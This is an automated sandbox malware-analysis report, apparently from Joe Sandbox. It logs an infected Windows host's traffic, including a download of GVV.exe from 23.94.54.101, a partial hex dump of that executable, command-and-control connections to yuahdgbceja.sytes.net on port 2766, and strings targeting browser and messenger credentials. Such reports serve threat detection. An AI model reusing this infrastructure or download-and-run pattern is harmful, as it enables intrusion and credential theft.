          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161

          Networking

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.94.53.100 2766Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: geoplugin.net
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: yuahdgbceja.sytes.net
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
          Source: Malware configuration extractorURLs: yuahdgbceja.sytes.net
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.53.100:2766
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 02 May 2024 19:51:03 GMTAccept-Ranges: bytesETag: "9ff8a010ca9cda1:0"Server: Microsoft-IIS/8.5Date: Sat, 04 May 2024 08:02:37 GMTContent-Length: 1369600Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 62 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 36 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 15 00 00 04 00 00 f4 13 15 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 7b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 14 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 7b 07 00 00 40 0d 00 00 7c 07 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 c0 14 00 00 76 00 00 00 70 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 23.94.54.101 23.94.54.101
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,3_2_00A6CE44
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].jsonJump to behavior
          Source: global trafficHTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: bhvA870.tmp.10.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
          Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: svchost.exe, 0000000A.00000003.816812906.000000000014D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.facebook.com (Facebook)
          Source: svchost.exe, 0000000A.00000003.816812906.000000000014D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.yahoo.com (Yahoo)
          Source: bhvA870.tmp.10.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
